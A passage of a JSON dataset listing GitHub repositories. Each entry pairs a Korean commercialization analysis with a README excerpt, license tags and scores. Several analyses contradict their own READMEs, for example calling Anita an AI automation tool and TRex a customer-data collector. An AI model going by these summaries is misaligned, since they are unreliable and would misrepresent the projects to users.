II.java](https://github.com/awangdev/LintCode/blob/master/Java/Majority%20Number%20II.java)|Medium|[Enumeration, Greedy]|||Java|1|\n|N/A|[Search a 2D Matrix II.java](https://github.com/awangdev/LintCode/blob/master/Java/Search%20a%202D%20Matrix%20II.java)|Medium|[Binary Search, Divide and Conquer]|||Java|2|\n|N/A|[Missing Ran","composite_score":0.0678,"license_safety_tag":"unknown"},{"name":"fmfn/BayesianOptimization","github_url":"https://github.com/fmfn/BayesianOptimization","stars":8,"language":"Python","license":"mit","abandonment_months":0,"description":"# BayesianOptimization 상품화 분석\n\n## 왜 보물인가\n복잡한 문제의 최적 답을 찾을 때 시행착오를 최소화하여 비용과 시간을 크게 줄여주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 머신러닝 모델 자동 튜닝 SaaS**\n- 데이터 분석 회사들이 AI 모델을 더 빠르게 개선할 수 있는 웹 서비스로 제공\n- 월 구독으로 반복되는 ","readme_excerpt":"<div align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/bayesian-optimization/BayesianOptimization/master/docsrc/static/func.png\"><br><br>\n</div>\n\n# Bayesian Optimization\n\n![tests](https://github.com/bayesian-optimization/BayesianOptimization/actions/workflows/run_tests.yml/badge.svg)\n[![docs - stable](https://img.shields.io/badge/docs-stable-blue)](https://bayesian-optimization.github.io/BayesianOptimization/index.html)\n[![Codecov](https://codecov.io/github/bayesian-optimization/BayesianOptimization/badge.svg?branch=master&service=github)](https://codecov.io/github/bayesian-optimization/BayesianOptimization?branch=master)\n[![Pypi](https://img.shields.io/pypi/v/bayesian-optimization.svg)](https://pypi.python.org/pypi/bayesian-optimization)\n![PyPI - Python Version](https://img.shields.io/pypi/pyversions/bayesian-optimization)\n\n\nPure Python implementation of bayesian global optimization with gaussian\nprocesses.\n\n\nThis is a constrained global optimization package built upon bay","composite_score":0.0678,"license_safety_tag":"safe"},{"name":"edk2-porting/edk2-sdm845","github_url":"https://github.com/edk2-porting/edk2-sdm845","stars":5,"language":"ASL","license":"BSD-2-Clause","abandonment_months":3,"description":"# edk2-porting/edk2-sdm845 저장소 분석\n\n## 왜 보물인가\n스마트폰 칩셋(SDM845)을 다른 운영체제로 작동하게 하는 핵심 기술로, 기존 단말기들을 새로운 용도로 재활용할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n1. **단말기 호환성 서비스**: 구형 스마트폰에 다양한 운영체제를 설치해주는 유료 변환 서비스\n2. **기업용 장비","readme_excerpt":"# EDK2 UEFI firmware for Qualcomm Snapdragon platforms\n\n![banner_wide_dark](https://user-images.githubusercontent.com/17036722/199902341-b086ec31-8d5c-4766-953a-8b9e1492de8b.png)\n\n![Github](https://img.shields.io/github/downloads/edk2-porting/edk2-sdm845/total)\n![Github](https://img.shields.io/github/v/release/edk2-porting/edk2-sdm845?include_prereleases)\n\n## Description\n\nThis repository aims to provide an usable EDK2 UEFI environment for modern Qualcomm SoCs.\n\nIt can be used as a boot manager for multi-booting mainline Linux, Android and optionally Windows on certain SoCs.\n\n## User guide and documentations\n\nPlease visit [Renegade Project Wiki](https://wiki.renegade-project.cn/)\n\n## Acknowledgements\n- Gustave Monce and his [SurfaceDuoPkg](https://github.com/WOA-Project/SurfaceDuoPkg)\n- [DuoWoa Project](https://github.com/WOA-Project)\n- [EFIDroid](https://github.com/efidroid)\n- [Ben (Bingxing) Wang](https://github.com/imbushuo/)\n- [Lumia950XLPkg](https://github.com/WOA-Project/Lumia950X","composite_score":0.0676,"license_safety_tag":"safe"},{"name":"limonte/sweetalert2","github_url":"https://github.com/limonte/sweetalert2","stars":6,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# SweetAlert2 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 사용자에게 보기 좋은 알림 메시지를 쉽게 띄워주는 도구로, 많은 개발자들이 이미 신뢰하고 있는 핵심 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 전자상거래 플랫폼에서 주문 완료, 결제 실패 등 거래 상황을 사용자에게 알림\n- **내부 업무 도구**: 기업 직원","readme_excerpt":"<a href=\"https://sweetalert2.github.io/\">\n  <img src=\"./assets/swal2-logo.png\" width=\"498\" alt=\"SweetAlert2\">\n</a>\n\nA beautiful, responsive, customizable, accessible (WAI-ARIA) replacement <br> for JavaScript's popup boxes. Zero dependencies.\n\n---\n\n### [Installation](https://sweetalert2.github.io/#download) | [Usage](https://sweetalert2.github.io/#usage) | [Examples](https://sweetalert2.github.io/#examples) | [Recipe gallery](https://sweetalert2.github.io/recipe-gallery/) | [React](https://github.com/sweetalert2/sweetalert2-react-content) | [Angular](https://github.com/sweetalert2/ngx-sweetalert2) | [Laravel](https://github.com/sweetalert2/sweetalert2-laravel)\n\n---\n\n✨ 🚀 ✨ Get 20% discount on Hostiger Web Hosting: https://hostinger.com/?REFERRALCODE=BKZHOSTINDAB\n\n# Sponsors\n\nFor all questions related to sponsorship please get in touch with me via email sweetalert2@gmail.com\n\n<table>\n<tr>\n<td align=\"center\"><a href=\"SPONSORS.md#sponsors\"><img src=\"https://sweetalert2.github.io/images/plu","composite_score":0.0675,"license_safety_tag":"safe"},{"name":"antvis/g2","github_url":"https://github.com/antvis/g2","stars":42,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# G2 저장소 분석 보고서\n\n## 왜 보물인가\n데이터를 아름다운 차트와 그래프로 자동으로 변환해주는 오픈소스 도구로, 누구나 복잡한 정보를 한눈에 이해할 수 있는 시각화를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS**: 기업 대시보드나 분석 서비스에서 고객이 업무 성과를 차트로 볼 수 있게 제공\n- **내부 업무 도구**: 회사의 판매","readme_excerpt":"<img src=\"https://gw.alipayobjects.com/zos/antfincdn/R8sN%24GNdh6/language.svg\" width=\"18\"> English | [简体中文](./README.zh-CN.md)\n\n<h1 align=\"center\">\n<b>G2: The Concise and Progressive Visualization Grammar</b>\n</h1>\n\n<div align=\"center\">\n\nG2 is a visualization grammar for dashboard building, data exploration and storytelling.\n\n<a href=\"https://trendshift.io/repositories/4408\" target=\"_blank\"><img src=\"https://trendshift.io/api/badge/repositories/4408\" alt=\"antvis%2FG2 | Trendshift\" style=\"width: 250px; height: 55px;\" width=\"250\" height=\"55\"/></a>\n\n[![Build Status](https://github.com/antvis/G2/actions/workflows/build.yml/badge.svg)](https://github.com/antvis/G2/actions/workflows/build.yml)\n[![Coverage Status](https://img.shields.io/coveralls/github/antvis/g2/v5.svg)](https://coveralls.io/github/antvis/g2?branch=v5)\n[![npm Version](https://img.shields.io/npm/v/@antv/g2.svg)](https://www.npmjs.com/package/@antv/g2)\n[![npm Download](https://img.shields.io/npm/dm/@antv/g2.svg)](https://www.","composite_score":0.0674,"license_safety_tag":"safe"},{"name":"projectdiscovery/proxify","github_url":"https://github.com/projectdiscovery/proxify","stars":6,"language":"Go","license":"MIT","abandonment_months":3,"description":"# Proxify 프로젝트 분석\n\n## 왜 보물인가\n인터넷 통신을 안전하게 감시하고 관리할 수 있는 도구로, 기업의 보안 감시와 문제 진단을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**\n기업용 보안 모니터링 플랫폼으로 운영하여 고객사의 네트워크 트래픽을 실시간으로 감시하고 위험 요소를 자동 탐지하는 구독 서비스 제공\n\n**내부","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"static/proxify-logo.png\" alt=\"proxify\" width=\"200px\" />\n</h1>\n\n<p align=\"center\">\n<a href=\"https://opensource.org/licenses/MIT\"><img src=\"https://img.shields.io/badge/license-MIT-_red.svg\"></a>\n<a href=\"https://github.com/projectdiscovery/proxify/issues\"><img src=\"https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat\"></a>\n<a href=\"https://goreportcard.com/badge/github.com/projectdiscovery/proxify\"><img src=\"https://goreportcard.com/badge/github.com/projectdiscovery/proxify\"></a>\n<a href=\"https://github.com/projectdiscovery/proxify/releases\"><img src=\"https://img.shields.io/github/release/projectdiscovery/proxify\"></a>\n<a href=\"https://hub.docker.com/r/projectdiscovery/proxify\"><img src=\"https://img.shields.io/docker/pulls/projectdiscovery/proxify.svg\"></a>\n<a href=\"https://twitter.com/pdiscoveryio\"><img src=\"https://img.shields.io/twitter/follow/pdiscoveryio.svg?logo=twitter\"></a>\n<a href=\"https://discord.gg/projectdiscovery\"><im","composite_score":0.0674,"license_safety_tag":"safe"},{"name":"gregjacobs/Autolinker.js","github_url":"https://github.com/gregjacobs/Autolinker.js","stars":7,"language":"TypeScript","license":"mit","abandonment_months":3,"description":"# Autolinker.js 사업화 분석\n\n## 왜 보물인가\n웹페이지의 텍스트에서 자동으로 링크를 찾아내 클릭 가능하게 만들어주는 기술로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **채팅 애플리케이션**: 사용자가 메시지에 입력한 URL이나 이메일 주소를 자동으로 링크로 변환하는 SaaS 서비스\n2. **소셜 미디어 관리 ","readme_excerpt":"# Autolinker.js\n\n![version](https://img.shields.io/badge/dynamic/json?url=https%3A%2F%2Fraw.githubusercontent.com%2Fgregjacobs%2FAutolinker.js%2Frefs%2Fheads%2Fmaster%2Fpackage.json&query=%24.version&label=Version)\n[![NPM Downloads](https://img.shields.io/npm/dw/autolinker)](https://www.npmjs.com/package/autolinker)\n[![build](https://github.com/gregjacobs/Autolinker.js/actions/workflows/main.yml/badge.svg)](https://github.com/gregjacobs/Autolinker.js/actions/workflows/main.yml)\n[![codecov](https://codecov.io/github/gregjacobs/Autolinker.js/graph/badge.svg?token=6sqLqa2oeb)](https://codecov.io/github/gregjacobs/Autolinker.js)\n[![GitHub License](https://img.shields.io/github/license/gregjacobs/Autolinker.js)](https://github.com/gregjacobs/Autolinker.js/blob/master/LICENSE)\n\nAutomatic linking of URLs, emails, phone numbers, mentions, and hashtags in text.\n\n```\nInput:  \"Visit google.com\" \n         \n               |\n               |\n               v\n\nOutput: \"Visit <a href=\"https://google.c","composite_score":0.0672,"license_safety_tag":"safe"},{"name":"oddlama/gentoo-install","github_url":"https://github.com/oddlama/gentoo-install","stars":14,"language":"Shell","license":"MIT","abandonment_months":3,"description":"# gentoo-install 저장소 분석\n\n## 왜 보물인가\n리눅스 설치 과정을 자동화하여 복잡한 컴퓨터 설정을 누구나 쉽게 할 수 있도록 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 리눅스 서버 자동 구성 서비스로, 중소기업이 서버를 직접 구축하지 않고도 즉시 사용 가능\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"## About gentoo-install\n\nThis project aspires to be your favourite way to install gentoo.\nIt aims to provide a smooth installation experience, both for beginners and experts.\nYou may configure it by using a menuconfig-inspired interface or simply via a config file.\n\nIt supports the most common disk layouts, different file systems like ext4, ZFS and btrfs as well\nas additional layers such as LUKS or mdraid. It also supports both EFI (recommended) and BIOS boot,\nand can be used with systemd or OpenRC as the init system. SSH can also be configured to allow using an automation framework\nlike [Ansible](https://github.com/ansible/ansible) or [Fora](https://github.com/oddlama/fora) to automate beyond system installation.\n\n[Usage](#usage) |\n[Overview](#overview) |\n[Updating the Kernel](#updating-the-kernel) |\n[Recommendations](#recommendations) |\n[FAQ](#troubleshooting-and-faq)\n\n![](contrib/screenshot_configure.png)\n\nThis installer might appeal to you if\n\n- you want to try gentoo without initi","composite_score":0.0672,"license_safety_tag":"safe"},{"name":"achannarasappa/ticker","github_url":"https://github.com/achannarasappa/ticker","stars":7,"language":"Go","license":"GPL-3.0","abandonment_months":0,"description":"# ticker 저장소 분석\n\n## 왜 보물인가\n주식·암호화폐 등 금융 자산의 실시간 가격을 한눈에 추적할 수 있는 개인용 모니터링 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 투자자용 구독형 포트폴리오 추적 대시보드 (월 $9.99~)\n2. **내부 업무 도구**: 금융회사의 직원용 자산 모니터링 시스템 (라이선스 판매)\n3","readme_excerpt":"<p>\n    <a href=\"https://github.com/achannarasappa/ticker/releases\"><img src=\"https://img.shields.io/github/v/release/achannarasappa/ticker\" alt=\"Latest Release\"></a>\n    <a href=\"https://github.com/achannarasappa/ticker/actions\"><img src=\"https://github.com/achannarasappa/ticker/workflows/test/badge.svg\" alt=\"Build Status\"></a>\n    <a href='https://coveralls.io/github/achannarasappa/ticker?branch=master'><img src='https://coveralls.io/repos/github/achannarasappa/ticker/badge.svg?branch=master' alt='Coverage Status' /></a>\n    <a href='https://goreportcard.com/badge/github.com/achannarasappa/ticker'><img src='https://goreportcard.com/badge/github.com/achannarasappa/ticker' alt='Report Card' /></a>\n</p>\n\n<h1 align=\"center\">Ticker</h2>\n<p align=\"center\">\nTerminal stock & crypto price watcher and position tracker\n</p>\n<p align=\"center\">\n<img align=\"center\" src=\"./docs/ticker.gif\" />\n</p>\n\n## Features\n\n* Live stock & crypto price quotes\n* Track value of your stock positions\n* Support for m","composite_score":0.0667,"license_safety_tag":"restricted"},{"name":"antvis/g6","github_url":"https://github.com/antvis/g6","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# antvis/g6 보물 분석\n\n## 왜 보물인가\n복잡한 데이터를 시각적인 그래프와 다이어그램으로 변환해주는 오픈소스 도구로, 데이터 분석과 의사결정에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n- **데이터 분석 SaaS**: 기업의 판매 네트워크, 조직도, 공급망을 한눈에 보여주는 분석 플랫폼\n- **내부 업무 도구**: 은행의 거래 관계도, 병","readme_excerpt":"<img src=\"https://gw.alipayobjects.com/zos/antfincdn/R8sN%24GNdh6/language.svg\" width=\"18\"> English | [简体中文](./README.zh-CN.md)\n\n<h1 align=\"center\">\n<b>G6: A Graph Visualization Framework in TypeScript</b>\n</h1>\n\n![](https://user-images.githubusercontent.com/6113694/45008751-ea465300-b036-11e8-8e2a-166cbb338ce2.png)\n\n<p align=\"center\">\n<a href=\"https://trendshift.io/repositories/9709\" target=\"_blank\"><img src=\"https://trendshift.io/api/badge/repositories/9709\" alt=\"antvis%2FG6 | Trendshift\" style=\"width: 250px; height: 55px;\" width=\"250\" height=\"55\"/></a>\n</p>\n\n[![npm Version](https://img.shields.io/npm/v/@antv/g6.svg)](https://www.npmjs.com/package/@antv/g6)\n[![Build Status](https://github.com/antvis/G6/actions/workflows/build.yml/badge.svg)](https://github.com/antvis/G6/actions/workflows/build.yml)\n[![codecov](https://codecov.io/gh/antvis/G6/graph/badge.svg?token=OvIk06tCPa)](https://codecov.io/gh/antvis/G6)\n[![npm Download](https://img.shields.io/npm/dm/@antv/g6.svg)](https://www.np","composite_score":0.0666,"license_safety_tag":"safe"},{"name":"uav4geo/LibreTranslate","github_url":"https://github.com/uav4geo/LibreTranslate","stars":8,"language":"Python","license":"AGPL-3.0","abandonment_months":1,"description":"# LibreTranslate 상용화 분석\n\n## 왜 보물인가\n누구나 무료로 쓸 수 있는 번역 도구를 만들어 배포하는 오픈소스 프로젝트로, 큰 기업의 유료 번역 서비스에 대한 대안이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 법인/개인사업자 대상 월 구독형 번역 플랫폼 (문서, 이메일, 웹사이트 자동 번역)\n2. **","readme_excerpt":"# LibreTranslate\n\n[Try it online!](https://libretranslate.com) | [API Docs](https://docs.libretranslate.com) | [Community Forum](https://community.libretranslate.com/) | [Bluesky](https://bsky.app/profile/libretranslate.com)\n\n[![Python versions](https://img.shields.io/pypi/pyversions/libretranslate)](https://pypi.org/project/libretranslate) [![Run tests](https://github.com/LibreTranslate/LibreTranslate/workflows/Run%20tests/badge.svg)](https://github.com/LibreTranslate/LibreTranslate/actions?query=workflow%3A%22Run+tests%22) [![Build and Publish Docker Image](https://github.com/LibreTranslate/LibreTranslate/actions/workflows/publish-docker.yml/badge.svg)](https://github.com/LibreTranslate/LibreTranslate/actions/workflows/publish-docker.yml) [![Publish package](https://github.com/LibreTranslate/LibreTranslate/actions/workflows/publish-package.yml/badge.svg)](https://github.com/LibreTranslate/LibreTranslate/actions/workflows/publish-package.yml) [![Awesome Humane Tech](https://raw.github","composite_score":0.0664,"license_safety_tag":"risky"},{"name":"anita-app/anita","github_url":"https://github.com/anita-app/anita","stars":16,"language":"TypeScript","license":"unknown","abandonment_months":4,"description":"# anita-app/anita 분석 보고서\n\n## 왜 보물인가\nAI 기술을 활용한 자동화 솔루션으로, 반복적인 업무를 줄여 생산성을 높일 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 자동화 SaaS**: 중소 전자상거래업체가 채팅봇으로 고객 질문에 자동 응답하도록 제공\n2. **기업 내부 업무 도구**: 대기업 HR팀이 직원 요청서","readme_excerpt":"# Anita\n\nAnita is a private, no-server, powerful and fully customizable data management solution, open source and free of charge. \n\nWith Anita you can organize any number of things you want to track, with one of our pre-configured Anita Templates or by defining your own custom data structure. \n\nAnita can handle many different data types, and can present your data in multiple useful ways.\n\n### Portable\n\nYour data is stored on your computer in a JSON file and/or on a remote database of your choice: flexible, open & no lock-in. Stay independent from servers that will go away, sooner or later.\n\n### Secure\n\nThere is no risk of a data breach like there is with cloud based solutions: Anita works fully offline. You keep your data where it's most safe, with you.\n\n### Private\n\nAnita is the privacy you want, the convenience you need. It fully works without any cloud, so your data is never exposed to a third party: no more middlemen, profiling or ads targeting.\n\n## Anita is still in Beta\n\nAnita is","composite_score":0.0662,"license_safety_tag":"unknown"},{"name":"tdaede/td-crt","github_url":"https://github.com/tdaede/td-crt","stars":6,"language":"Rust","license":"unknown","abandonment_months":4,"description":"# tdaede/td-crt 분석\n\n## 왜 보물인가\n저장소 정보가 매우 제한적이어서 구체적인 기능이나 가치를 파악하기 어렵습니다. 별 6개 수준의 초기 프로젝트로 보이며, 먼저 소스코드를 직접 확인해야 합니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 정보 없음 - 코드 분석 필요\n**내부 업무 도구**: 정보 없음 - 코드 분석 필요\n**AP","readme_excerpt":"# td-crt\n\nThis repo contains work-in-progress electronics to control a CRT monitor (aka a CRT chassis).\n\nIt is divided up into several separate projects, as follows:\n\n* **[td-deflect](td-deflect/)** - Main PCB, containing microcontroller, horizontal and vertical deflection circuits, RGB amplifier, B+ power supply, 12V and -12V power supplies, and heater power supply. Functional with an enormous amount of rework.\n\n* **[td-hv](td-hv/)** - Regulated HV/focus/screen power supply, based on K7000 clone flyback. Currently marginally functional, demos were done with the original monitor's HV.\n\n* **[td-rgbinput](td-rgbinput/)** - Poorly named RGB amplifier that replaces the version on td-deflect, using more modern parts. Currently untested.\n\n* **[td-180v](td-180v/)** - 180V (and heater) boost converter, designed to be installed on a neck board to provide an optional dedicated power supply for the cathode amplifiers.\n\n* **[td-rgb](td-rgb/)** - Old RGB mod PCB, I should move it to a separate repo","composite_score":0.0661,"license_safety_tag":"unknown"},{"name":"amebalabs/TRex","github_url":"https://github.com/amebalabs/TRex","stars":34,"language":"Swift","license":"MIT","abandonment_months":3,"description":"# TRex 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 자동으로 찾아내고 정리해주는 도구로, 데이터 처리에 시간을 낭비하는 기업들의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 마케팅 담당자들이 고객 정보를 자동으로 수집하고 분류하는 클라우드 플랫폼\n2. **내부 업무 도구**: 대기업의 HR팀이 지원","readme_excerpt":"[![GitHub license](https://img.shields.io/github/license/amebalabs/TRex.svg)](https://github.com/amebalabs/TRex/blob/master/LICENSE)\n[![Latest Release](https://img.shields.io/github/v/release/amebalabs/TRex)](https://github.com/amebalabs/TRex/releases/latest)\n[![Github all releases](https://img.shields.io/github/downloads/amebalabs/TRex/total.svg)](https://github.com/amebalabs/TRex/releases/)\n\n\n<p align=\"center\">\n <img width=\"155\" height=\"150\" alt=\"TRex Logo\" src=\"https://github.com/amebalabs/TRex/blob/main/Resources/logo.png\">\n</p>\n\n# TRex 🦖\n\nTRex captures any text right into your Clipboard with magic of OCR. \n\nBut what is OCR anyway? Imagine you have a PDF file or a Web page where you can't select the text, image with text on it, or even a YouTube video. Forget retyping it manually; with TRex, you can extract text from anywhere, and it is as easy as taking a screenshot.\n\nTRex lives in the menu bar and available right where you need it the most:\n\n![TRex](https://github.com/amebalabs/T","composite_score":0.066,"license_safety_tag":"safe"},{"name":"salesforce/sloop","github_url":"https://github.com/salesforce/sloop","stars":10,"language":"Go","license":"BSD-3-Clause","abandonment_months":3,"description":"# Salesforce Sloop 상용화 분석\n\n## 왜 보물인가\nSalesforce가 개발한 이 도구는 복잡한 클라우드 시스템을 쉽게 관리할 수 있게 해주는 숨은 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 업무관리 플랫폼이 복잡한 시스템 상태를 사용자 친화적으로 표시하는 기능\n2. **내부 업무 도구**: 대기업의","readme_excerpt":"# Sloop - Kubernetes History Visualization\n\n[![Publish Status](https://github.com/salesforce/sloop/workflows/Publish/badge.svg)](https://github.com/salesforce/sloop/actions)\n[![Build Status](https://github.com/salesforce/sloop/workflows/Test/badge.svg)](https://github.com/salesforce/sloop/actions)\n[![Go Report Card](https://goreportcard.com/badge/github.com/salesforce/sloop)](https://goreportcard.com/report/github.com/salesforce/sloop)\n\n<img src=\"https://github.com/salesforce/sloop/raw/master/other/sloop_logo_color_small_notext.png\">\n\n---\n\nSloop monitors Kubernetes, recording histories of events and resource state changes\nand providing visualizations to aid in debugging past events.\n\nKey features:\n\n1. Allows you to find and inspect resources that no longer exist (example: discover what host the pod from the previous deployment was using).\n1. Provides timeline displays that show rollouts of related resources in updates to Deployments, ReplicaSets, and StatefulSets.\n1. Helps debug transi","composite_score":0.066,"license_safety_tag":"safe"},{"name":"ellie/atuin","github_url":"https://github.com/ellie/atuin","stars":7,"language":"","license":"MIT","abandonment_months":3,"description":"# ellie/atuin 분석 보고서\n\n## 왜 보물인가\n터미널(컴퓨터 명령 입력창)에서 과거 명령어를 똑똑하게 검색하고 관리할 수 있는 도구로, 개발자의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발 팀 협업 SaaS**: 팀원들의 명령어 이력을 클라우드에 공유하고 검색하는 구독 서비스\n2. **기업 개발 환경 도구**: ","readme_excerpt":"<p align=\"center\">\n <picture>\n  <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://github.com/atuinsh/atuin/assets/53315310/13216a1d-1ac0-4c99-b0eb-d88290fe0efd\">\n  <img alt=\"Text changing depending on mode. Light: 'So light!' Dark: 'So dark!'\" src=\"https://github.com/atuinsh/atuin/assets/53315310/08bc86d4-a781-4aaa-8d7e-478ae6bcd129\">\n</picture>\n</p>\n\n<p align=\"center\">\n<em>magical shell history</em>\n</p>\n\n<hr/>\n\n<p align=\"center\">\n  <a href=\"https://github.com/atuinsh/atuin/actions?query=workflow%3ARust\"><img src=\"https://img.shields.io/github/actions/workflow/status/atuinsh/atuin/rust.yml?style=flat-square\" /></a>\n  <a href=\"https://crates.io/crates/atuin\"><img src=\"https://img.shields.io/crates/v/atuin.svg?style=flat-square\" /></a>\n  <a href=\"https://crates.io/crates/atuin\"><img src=\"https://img.shields.io/crates/d/atuin.svg?style=flat-square\" /></a>\n  <a href=\"https://github.com/atuinsh/atuin/blob/main/LICENSE\"><img src=\"https://img.shields.io/crates/l/atuin.svg?style=fl","composite_score":0.0659,"license_safety_tag":"safe"},{"name":"ArangXG/molty5","github_url":"https://github.com/ArangXG/molty5","stars":16,"language":"Python","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.0659,"license_safety_tag":"unknown"},{"name":"mxschmitt/playwright-go","github_url":"https://github.com/mxschmitt/playwright-go","stars":23,"language":"Go","license":"MIT","abandonment_months":3,"description":"# Playwright-Go 저장소 분석\n\n## 왜 보물인가\n웹사이트를 자동으로 제어하고 테스트하는 기술을 Go 프로그래밍 언어로 사용할 수 있게 만든 도구로, 빠르고 안정적인 자동화 작업이 필요한 기업들의 핵심 요구를 충족합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 모니터링 SaaS**: 고객 웹사이트의 장애를 자동으로 감지하고 알림을 보내는 서비스","readme_excerpt":"# 🎭 [Playwright](https://github.com/microsoft/playwright#readme) for <img src=\"https://user-images.githubusercontent.com/17984549/91302719-343a1d80-e7a7-11ea-8d6a-9448ef598420.png\" height=\"35\" />\n\n## Looking for maintainers and see [here](https://github.com/playwright-community/playwright-go/issues/122). Thanks!\n\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/playwright-community/playwright-go)](https://pkg.go.dev/github.com/playwright-community/playwright-go)\n[![License](https://img.shields.io/badge/License-MIT-blue.svg)](http://opensource.org/licenses/MIT)\n[![Go Report Card](https://goreportcard.com/badge/github.com/playwright-community/playwright-go)](https://goreportcard.com/report/github.com/playwright-community/playwright-go) ![Build Status](https://github.com/playwright-community/playwright-go/workflows/Go/badge.svg)\n[![Join Slack](https://img.shields.io/badge/join-slack-infomational)](https://aka.ms/playwright-slack) [![Coverage Status](https://coveralls.io/repos/github/playw","composite_score":0.0658,"license_safety_tag":"safe"},{"name":"FriendsOfPHP/PHP-CS-Fixer","github_url":"https://github.com/FriendsOfPHP/PHP-CS-Fixer","stars":5,"language":"PHP","license":"mit","abandonment_months":0,"description":"# PHP-CS-Fixer 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 작성한 코드를 자동으로 깔끔하게 정리해주는 도구로, 수천 개의 프로젝트에서 필수적으로 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 코드 정리 서비스**: 기업의 프로그래밍 팀이 구독해 자동으로 코드 품질을 관리하는 SaaS 플랫폼\n2. **개발자 IDE 플러그인**","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://cs.symfony.com\">\n        <img src=\"./logo.png\" title=\"PHP CS Fixer\" alt=\"PHP CS Fixer logo\">\n    </a>\n</p>\n\n# PHP Coding Standards Fixer\n\nThe PHP Coding Standards Fixer (PHP CS Fixer) fixes your code to follow the standards.\n\nIf you are already using a linter to identify coding standards problems in your\ncode, you know that fixing them by hand is tedious, especially on large\nprojects. This tool not only detects them, but also fixes them for you.\n\nPHP CS Fixer has built-in rule sets, whether you want to follow PHP coding standards as defined by [PHP-FIG's PER Coding Style](https://www.php-fig.org/per/coding-style/) - [`@PER-CS`](./doc/ruleSets/PER-CS.rst),\na wide community like the [Symfony](https://symfony.com/doc/current/contributing/code/standards.html) - [`@Symfony`](./doc/ruleSets/Symfony.rst),\nor our opinionated one - [@PhpCsFixer](./doc/ruleSets/PhpCsFixer.rst).\nYou can also define your (team's) style through the [configuration file](./doc/","composite_score":0.0655,"license_safety_tag":"safe"},{"name":"hecrj/iced","github_url":"https://github.com/hecrj/iced","stars":20,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# hecrj/iced 분석 보고서\n\n## 왜 보물인가\n사용자 인터페이스를 만드는 과정을 매우 간단하게 해주는 도구로, 복잡한 작업을 누구나 쉽게 할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 소프트웨어 회사가 자신들의 웹/앱 서비스 개발 속도를 빠르게 하는 데 판매\n- **내부 업무 도구**: 기업의 HR팀이나 재","readme_excerpt":"<div align=\"center\">\n\n<img src=\"docs/logo.svg\" width=\"140px\" />\n\n# Iced\n\n[![Documentation](https://docs.rs/iced/badge.svg)][documentation]\n[![Crates.io](https://img.shields.io/crates/v/iced.svg)](https://crates.io/crates/iced)\n[![License](https://img.shields.io/crates/l/iced.svg)](https://github.com/iced-rs/iced/blob/master/LICENSE)\n[![Downloads](https://img.shields.io/crates/d/iced.svg)](https://crates.io/crates/iced)\n[![Test Status](https://img.shields.io/github/actions/workflow/status/iced-rs/iced/test.yml?branch=master&event=push&label=test)](https://github.com/iced-rs/iced/actions)\n[![Zulip Chat](https://img.shields.io/badge/chat-on%20Zulip-5e7ce2?logo=zulip&logoColor=white)](https://iced.zulipchat.com/)\n[![Discord Server](https://img.shields.io/discord/628993209984614400?label=&labelColor=6A7EC2&logo=discord&logoColor=ffffff&color=7389D8)](https://discord.gg/3xZJ65GAhd)\n\nA cross-platform GUI library for Rust focused on simplicity and type-safety.\nInspired by [Elm].\n\n<a href=\"http","composite_score":0.0653,"license_safety_tag":"safe"},{"name":"tobspr/shapez.io","github_url":"https://github.com/tobspr/shapez.io","stars":8,"language":"JavaScript","license":"GPL-3.0","abandonment_months":1,"description":"# shapez.io 저장소 분석\n\n## 왜 보물인가\n복잡한 공장 운영 시뮬레이션을 직관적으로 즐길 수 있는 게임으로, 전략적 사고력을 요구하는 중독성 있는 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 교육용 플랫폼으로 직원들의 생산성 최적화 개념을 게임으로 학습하는 온라인 훈련 프로그램\n2. **내부 업무 도구**: 대규","readme_excerpt":"## shapez 2 out now!\n\nShapez 2 is now available on Steam, adding multi-layer factories, better performance, trains, fluids, and much more!\n\n<a href=\"https://store.steampowered.com/app/2162800/shapez_2/?utm_medium=github&amp;utm_source=s1_github\" title=\"shapez 2 on Steam\">\n    <img src=\"https://i.imgur.com/QBOGSib.jpeg\" alt=\"shapez 2 Announcement\">\n</a>\n\n<br>\n\n# shapez\n\n<a href=\"https://get.shapez.io/ghi\" title=\"shapez on Steam\">\n    <img src=\"https://i.imgur.com/ihW2bUE.png\" alt=\"shapez Logo\">\n</a>\n\n## Contributing\n\nThis repository is no longer actively maintained, we have moved over to [shapez 2](https://store.steampowered.com/app/2162800/shapez_2/?utm_medium=github&utm_source=s1_github) development.\n\nPlease consider contributing to the 